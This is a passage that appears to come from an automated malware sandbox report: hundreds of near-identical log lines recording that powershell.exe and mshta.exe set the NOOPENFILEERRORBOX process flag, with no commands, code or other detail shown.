              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
